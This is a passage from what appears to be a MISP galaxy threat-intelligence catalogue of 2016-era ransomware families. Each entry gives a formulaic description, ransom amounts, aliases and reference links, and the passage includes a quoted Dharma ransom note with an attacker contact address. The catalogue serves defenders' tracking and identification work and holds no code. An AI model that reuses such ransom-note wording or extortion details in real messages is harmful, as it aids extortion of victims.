https://twitter.com/malwrhunterteam/status/811613888705859586

Manifestus Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. The hacker demands 0.2 bitcoins. The ransomware poses as a Windows update.

The tag is: misp-galaxy:ransomware="Manifestus Ransomware "

Table 8055. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/manifestus-ransomware.html

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-23rd-2016-cryptxxx-koolova-cerber-and-more/

https://twitter.com/struppigel/status/811587154983981056

EnkripsiPC Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. The name of the hacker is humanpuff69 and he requests 0.5 bitcoins. The encryption password is based on the computer name.

The tag is: misp-galaxy:ransomware="EnkripsiPC Ransomware"

EnkripsiPC Ransomware is also known as:

  • IDRANSOMv3

  • Manifestus

EnkripsiPC Ransomware has relationships with:

  • similar: misp-galaxy:malpedia="Manifestus" with estimative-language:likelihood-probability="likely"

Table 8056. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/enkripsipc-ransomware.html

https://twitter.com/demonslay335/status/811343914712100872

https://twitter.com/BleepinComputer/status/811264254481494016

https://twitter.com/struppigel/status/811587154983981056

BrainCrypt Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. So far the victims are from Belarus and Germany.

The tag is: misp-galaxy:ransomware="BrainCrypt Ransomware"

Table 8057. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/braincrypt-ransomware.html

MSN CryptoLocker Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. The ransom is 0.2 bitcoins.

The tag is: misp-galaxy:ransomware="MSN CryptoLocker Ransomware"

Table 8058. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/msn-cryptolocker-ransomware.html

https://twitter.com/struppigel/status/810766686005719040

CryptoBlock Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. The ransom amount is 0.3 bitcoins. The ransomware disguises itself as Adobe Systems, Incorporated. RaaS.

The tag is: misp-galaxy:ransomware="CryptoBlock Ransomware "

Table 8059. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/cryptoblock-ransomware.html

https://twitter.com/drProct0r/status/810500976415281154

AES-NI Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="AES-NI Ransomware "

Table 8060. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/aes-ni-ransomware.html

Koolova Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. The hacker behind this ransomware tends to make lots of spelling errors in his requests. It comes with Italian text and only targets the Test folder on the user’s desktop.

The tag is: misp-galaxy:ransomware="Koolova Ransomware"

Table 8061. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/koolova-ransomware.html

https://www.bleepingcomputer.com/news/security/koolova-ransomware-decrypts-for-free-if-you-read-two-articles-about-ransomware/

Fake Globe Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. The ransom is 1 bitcoin.

The tag is: misp-galaxy:ransomware="Fake Globe Ransomware"

Fake Globe Ransomware is also known as:

  • Globe Imposter

  • GlobeImposter

Fake Globe Ransomware has relationships with:

  • similar: misp-galaxy:malpedia="GlobeImposter" with estimative-language:likelihood-probability="likely"

Table 8062. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/fake-globe-ransomware.html

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-30th-2016-infected-tvs-and-open-source-ransomware-sucks/

https://twitter.com/fwosar/status/812421183245287424

https://decrypter.emsisoft.com/globeimposter

https://twitter.com/malwrhunterteam/status/809795402421641216

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-8th-2018-crybrazil-cryptconsole-and-magniber/

https://twitter.com/GrujaRS/status/1004661259906768896

V8Locker Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="V8Locker Ransomware"

Table 8063. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/v8locker-ransomware.html

Cryptorium (Fake Ransomware)

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It SUPPOSEDLY encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.; however, your files are not really encrypted, only their names are changed.

The tag is: misp-galaxy:ransomware="Cryptorium (Fake Ransomware)"

Table 8064. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/cryptorium-ransomware.html

Antihacker2017 Ransomware

It’s directed at Russian-speaking users and is therefore able to infect mostly the old USSR countries. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. The hacker goes by the nickname Antihacker and requests the victim to send him an email for the decryption. He does not request any money, only issues a warning about looking at porn (gay, incest and rape porn to be specific).

The tag is: misp-galaxy:ransomware="Antihacker2017 Ransomware"

Table 8065. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/antihacker2017-ransomware.html

CIA Special Agent 767 Ransomware (FAKE!!!)

It’s directed at English-speaking users and is therefore able to infect users all over the world. It is spread using email spam, fake updates, attachments and so on. It SUPPOSEDLY encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. Your files are not really encrypted and nothing actually happens; however, the hacker does ask the victim to pay a sum of 100$, after 5 days the sum goes up to 250$ and thereafter to 500$. After the payment is received, the victim gets the following message informing him that he has been fooled and simply needed to delete the note. https://4.bp.blogspot.com/-T8iSbbGOz84/WFGZEbuRfCI/AAAAAAAACm0/SO8Srwx2UIM3FPZcZl7W76oSDCsnq2vfgCPcB/s1600/code2.jpg

The tag is: misp-galaxy:ransomware="CIA Special Agent 767 Ransomware (FAKE!!!)"

Table 8066. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/cia-special-agent-767-ransomware.html

https://www.bleepingcomputer.com/virus-removal/remove-cia-special-agent-767-screen-locker

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-16th-2016-samas-no-more-ransom-screen-lockers-and-more/

https://guides.yoosecurity.com/cia-special-agent-767-virus-locks-your-pc-screen-how-to-unlock/

LoveServer Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. This hacker requests your IP address in return for the decryption.

The tag is: misp-galaxy:ransomware="LoveServer Ransomware "

Table 8067. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/loveserver-ransomware.html

Kraken Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. The hacker requests 2 bitcoins in return for the files.

The tag is: misp-galaxy:ransomware="Kraken Ransomware"

Table 8068. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/kraken-ransomware.html

Antix Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. The ransom is 0.25 bitcoins and the nickname of the hacker is FRC 2016.

The tag is: misp-galaxy:ransomware="Antix Ransomware"

Table 8069. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/antix-ransomware.html

PayDay Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. The ransom is R$950, which is due in 5 days (R$ is the Brazilian currency). Based off of Hidden-Tear.

The tag is: misp-galaxy:ransomware="PayDay Ransomware "

Table 8070. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/payday-ransomware.html

https://twitter.com/BleepinComputer/status/808316635094380544

Slimhem Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is NOT spread using email spam, fake updates, attachments and so on. It simply places a decrypt file on your computer.

The tag is: misp-galaxy:ransomware="Slimhem Ransomware"

Table 8071. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/slimhem-ransomware.html

M4N1F3STO Ransomware (FAKE!!!!!)

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. FILES DON’T REALLY GET DELETED NOR DO THEY GET ENCRYPTED!!!!!!!

The tag is: misp-galaxy:ransomware="M4N1F3STO Ransomware (FAKE!!!!!)"

Table 8072. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/m4n1f3sto-ransomware.html

Dale Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. CHIP > DALE

The tag is: misp-galaxy:ransomware="Dale Ransomware"

Dale Ransomware is also known as:

  • DaleLocker Ransomware

UltraLocker Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. Based on the idiotic open-source ransomware called CryptoWire.

The tag is: misp-galaxy:ransomware="UltraLocker Ransomware"

Table 8073. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/ultralocker-ransomware.html

https://twitter.com/struppigel/status/807161652663742465

AES_KEY_GEN_ASSIST Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="AES_KEY_GEN_ASSIST Ransomware"

Table 8074. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/aeskeygenassist-ransomware.html

https://id-ransomware.blogspot.co.il/2016/09/dxxd-ransomware.html

https://www.bleepingcomputer.com/forums/t/634258/aes-key-gen-assistprotonmailcom-help-support/

Code Virus Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="Code Virus Ransomware "

Table 8075. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/code-virus-ransomware.html

FLKR Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="FLKR Ransomware"

Table 8076. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/flkr-ransomware.html

PopCorn Time Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. These hackers claim to be students from Syria. This ransomware poses as the popular torrent movie screener called PopCorn. These criminals give you the chance to retrieve your files “for free” by spreading this virus to others, as shown in the note below: https://www.bleepstatic.com/images/news/ransomware/p/Popcorn-time/refer-a-friend.png

The tag is: misp-galaxy:ransomware="PopCorn Time Ransomware"

Table 8077. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/popcorntime-ransomware.html

https://www.bleepingcomputer.com/news/security/new-scheme-spread-popcorn-time-ransomware-get-chance-of-free-decryption-key/

HackedLocker Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. NO POINT IN PAYING THE RANSOM: THE HACKER DOES NOT PROVIDE A DECRYPTER AFTERWARDS.

The tag is: misp-galaxy:ransomware="HackedLocker Ransomware"

Table 8078. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/hackedlocker-ransomware.html

GoldenEye Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="GoldenEye Ransomware"

GoldenEye Ransomware has relationships with:

  • similar: misp-galaxy:ransomware="Petya" with estimative-language:likelihood-probability="likely"

Table 8079. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/goldeneye-ransomware.html

https://www.bleepingcomputer.com/news/security/petya-ransomware-returns-with-goldeneye-version-continuing-james-bond-theme/

https://www.bleepingcomputer.com/forums/t/634778/golden-eye-virus/

Sage Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="Sage Ransomware"

Table 8080. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/sage-ransomware.html

https://www.bleepingcomputer.com/forums/t/634978/sage-file-sample-extension-sage/

https://www.bleepingcomputer.com/forums/t/634747/sage-20-ransomware-sage-support-help-topic/

SQ_ Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. This hacker requests 4 bitcoins as ransom.

The tag is: misp-galaxy:ransomware="SQ_ Ransomware"

SQ_ Ransomware is also known as:

  • VO_ Ransomware

Table 8081. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/sq-vo-ransomware.html

Satan666 Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="Satan666 Ransomware"

Table 8083. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/satan666-ransomware.html

RIP (Phoenix) Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. Based on HiddenTear.

The tag is: misp-galaxy:ransomware="RIP (Phoenix) Ransomware"

RIP (Phoenix) Ransomware is also known as:

  • RIP

  • Phoenix

Table 8084. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/rip-ransomware.html

https://twitter.com/BleepinComputer/status/804810315456200704

Locked-In Ransomware or NoValid Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. Based on RemindMe.

The tag is: misp-galaxy:ransomware="Locked-In Ransomware or NoValid Ransomware"

Locked-In Ransomware or NoValid Ransomware is also known as:

  • Locked-In Ransomware

  • NoValid Ransomware

Table 8085. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/novalid-ransomware.html

https://www.bleepingcomputer.com/forums/t/634754/locked-in-ransomware-help-support-restore-corupted-fileshtml/

https://twitter.com/struppigel/status/807169774098796544

Chartwig Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="Chartwig Ransomware"

Table 8086. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/chartwig-ransomware.html

RenLocker Ransomware (FAKE)

It is spread using email spam, fake updates, attachments and so on. It claims to encrypt all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. The files don’t actually get encrypted; their names get changed using this formula: [number][.crypter]

The tag is: misp-galaxy:ransomware="RenLocker Ransomware (FAKE)"

Table 8087. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/renlocker-ransomware.html

Thanksgiving Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="Thanksgiving Ransomware"

Table 8088. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/thanksgiving-ransomware.html

https://id-ransomware.blogspot.co.il/2016/07/stampado-ransomware-1.html

https://twitter.com/BleepinComputer/status/801486420368093184

CockBlocker Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="CockBlocker Ransomware"

Table 8089. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/cockblocker-ransomware.html

https://twitter.com/jiriatvirlab/status/801910919739674624

Lomix Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. Based on the idiotic open-source ransomware called CryptoWire.

The tag is: misp-galaxy:ransomware="Lomix Ransomware"

Table 8090. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/lomix-ransomware.html

https://twitter.com/siri_urz/status/801815087082274816

OzozaLocker Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. https://3.bp.blogspot.com/--jubfYRaRmw/WDaOyZXkAaI/AAAAAAAACQE/E63a4FnaOfACZ07s1xUiv_haxy8cp5YCACLcB/s1600/ozoza2.png

The tag is: misp-galaxy:ransomware="OzozaLocker Ransomware"

Table 8091. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/ozozalocker-ransomware.html

https://decrypter.emsisoft.com/ozozalocker

https://twitter.com/malwrhunterteam/status/801503401867673603

Crypute Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="Crypute Ransomware"

Crypute Ransomware is also known as:

  • m0on Ransomware

Table 8092. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/crypute-ransomware-m0on.html

https://www.bleepingcomputer.com/virus-removal/threat/ransomware/

NMoreira Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="NMoreira Ransomware"

NMoreira Ransomware is also known as:

  • Fake Maktub Ransomware

Table 8093. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/nmoreira-ransomware.html

https://id-ransomware.blogspot.co.il/2016/10/airacrop-ransomware.html

VindowsLocker Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. The ransom amount is 349.99$ and the hacker seems to be from India. He disguises himself as Microsoft Support.

The tag is: misp-galaxy:ransomware="VindowsLocker Ransomware"

Table 8094. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/vindowslocker-ransomware.html

https://malwarebytes.app.box.com/s/gdu18hr17mwqszj3hjw5m3sw84k8hlph

https://rol.im/VindowsUnlocker.zip

https://twitter.com/JakubKroustek/status/800729944112427008

https://www.bleepingcomputer.com/news/security/vindowslocker-ransomware-mimics-tech-support-scam-not-the-other-way-around/

Donald Trump 2 Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files etc. The original ransomware under this name is described here: http://id-ransomware.blogspot.co.il/2016/09/donald-trump-ransomware.html

The tag is: misp-galaxy:ransomware="Donald Trump 2 Ransomware"

Table 8095. Table References

Links

http://id-ransomware.blogspot.co.il/2016/09/donald-trump-ransomware.html

https://www.bleepingcomputer.com/news/security/the-donald-trump-ransomware-tries-to-build-walls-around-your-files/

Nagini Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files etc. It looks for C:\Temp\voldemort.horcrux.

The tag is: misp-galaxy:ransomware="Nagini Ransomware"

Nagini Ransomware is also known as:

  • Voldemort Ransomware

Table 8096. Table References

Links

http://id-ransomware.blogspot.co.il/2016/09/nagini-voldemort-ransomware.html

https://www.bleepingcomputer.com/news/security/the-nagini-ransomware-sics-voldemort-on-your-files/

ShellLocker Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="ShellLocker Ransomware"

Table 8097. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/shelllocker-ransomware.html

https://twitter.com/JakubKroustek/status/799388289337671680

Chip Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="Chip Ransomware"

Chip Ransomware is also known as:

  • ChipLocker Ransomware

Table 8098. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/chip-ransomware.html

http://malware-traffic-analysis.net/2016/11/17/index.html

https://www.bleepingcomputer.com/news/security/rig-e-exploit-kit-now-distributing-new-chip-ransomware/

Dharma Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files etc. CrySiS > Dharma. Ransom note: "ATTENTION! At the moment, your system is not protected. We can fix it and restore files. To restore the system write to this address: bitcoin143@india.com." CrySiS variant.

The tag is: misp-galaxy:ransomware="Dharma Ransomware"

Table 8099. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/dharma-ransomware.html

https://www.bleepingcomputer.com/news/security/kaspersky-releases-decryptor-for-the-dharma-ransomware/

https://www.bleepingcomputer.com/news/security/new-cmb-dharma-ransomware-variant-released/

https://www.bleepingcomputer.com/news/security/new-bip-dharma-ransomware-variant-released/

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/

https://twitter.com/demonslay335/status/1049313390097813504

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/

https://twitter.com/JakubKroustek/status/1038680437508501504

https://twitter.com/demonslay335/status/1059521042383814657

https://twitter.com/demonslay335/status/1059940414147489792

https://twitter.com/JakubKroustek/status/1060825783197933568

https://twitter.com/JakubKroustek/status/1064061275863425025

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/

https://www.youtube.com/watch?v=qjoYtwLx2TI

https://twitter.com/GrujaRS/status/1072139616910757888

Angela Merkel Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="Angela Merkel Ransomware"

Table 8100. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/angela-merkel-ransomware.html

https://twitter.com/malwrhunterteam/status/798268218364358656

CryptoLuck Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="CryptoLuck Ransomware"

CryptoLuck Ransomware is also known as:

  • YafunnLocker

Table 8101. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/cryptoluck-ransomware.html

http://www.bleepingcomputer.com/news/security/cryptoluck-ransomware-being-malvertised-via-rig-e-exploit-kits/

https://twitter.com/malwareforme/status/798258032115322880

Crypton Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="Crypton Ransomware"

Crypton Ransomware is also known as:

  • Nemesis

  • X3M

Table 8102. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/crypton-ransomware.html

https://decrypter.emsisoft.com/crypton

https://www.bleepingcomputer.com/news/security/crypton-ransomware-is-here-and-its-not-so-bad-/

https://twitter.com/JakubKroustek/status/829353444632825856

Karma Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc. It pretends to be a Windows optimization program called Windows-TuneUp.

The tag is: misp-galaxy:ransomware="Karma Ransomware"

Table 8103. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/karma-ransomware.html

https://www.bleepingcomputer.com/news/security/researcher-finds-the-karma-ransomware-being-distributed-via-pay-per-install-network/

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-18th-2016-crysis-cryptoluck-chip-and-more/

WickedLocker HT Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="WickedLocker HT Ransomware"

Table 8104. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/wickedlocker-ht-ransomware.html

PClock3 Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc. CryptoLocker copycat.

The tag is: misp-galaxy:ransomware="PClock3 Ransomware"

PClock3 Ransomware is also known as:

  • PClock SuppTeam Ransomware

  • WinPlock

  • CryptoLocker clone

Table 8105. Table References

Links

https://www.bleepingcomputer.com/news/security/old-cryptolocker-copycat-named-pclock-resurfaces-with-new-attacks/

https://id-ransomware.blogspot.co.il/2016/11/suppteam-ransomware-sysras.html

http://researchcenter.paloaltonetworks.com/2015/09/updated-pclock-ransomware-still-comes-up-short/

https://decrypter.emsisoft.com/

Kolobo Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="Kolobo Ransomware"

Kolobo Ransomware is also known as:

  • Kolobocheg Ransomware

Table 8106. Table References

Links

https://www.ransomware.wiki/tag/kolobo/

https://id-ransomware.blogspot.co.il/2016/11/kolobo-ransomware.html

https://forum.drweb.com/index.php?showtopic=315142

PaySafeGen (German) Ransomware

This is most likely to affect German-speaking users, since the note is written in German, so it mostly affects users in German-speaking countries. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="PaySafeGen (German) Ransomware"

PaySafeGen (German) Ransomware is also known as:

  • Paysafecard Generator 2016

  • PaySafeCard

  • PaySafeGen

Table 8107. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/paysafegen-german-ransomware.html

https://twitter.com/JakubKroustek/status/796083768155078656

Telecrypt Ransomware

This is most likely to affect Russian-speaking users, since the note is written in Russian; residents of Russian-speaking countries are therefore affected. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc. The ransomware's authors request around $75 from their victims to provide them with a decryptor (payments are accepted via the Russian payment services Qiwi or Yandex.Money). Right from the start, however, researchers suggested that TeleCrypt was written by cybercriminals without advanced skills. Telecrypt generates a random string to encrypt with that is between 10 and 20 characters long and contains only the letter pairs vo, pr, bm, xu, zt, dq.

The tag is: misp-galaxy:ransomware="Telecrypt Ransomware"

Table 8108. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/telecrypt-ransomware.html

http://www.securityweek.com/telecrypt-ransomwares-encryption-cracked

https://malwarebytes.app.box.com/s/kkxwgzbpwe7oh59xqfwcz97uk0q05kp3

https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/

https://securelist.com/blog/research/76558/the-first-cryptor-to-exploit-telegram/

CerberTear Ransomware

This is most likely to affect English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="CerberTear Ransomware"

Table 8109. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/cerbertear-ransomware.html

https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/november-2016-month-ransomware/

https://twitter.com/struppigel/status/795630452128227333

FuckSociety Ransomware

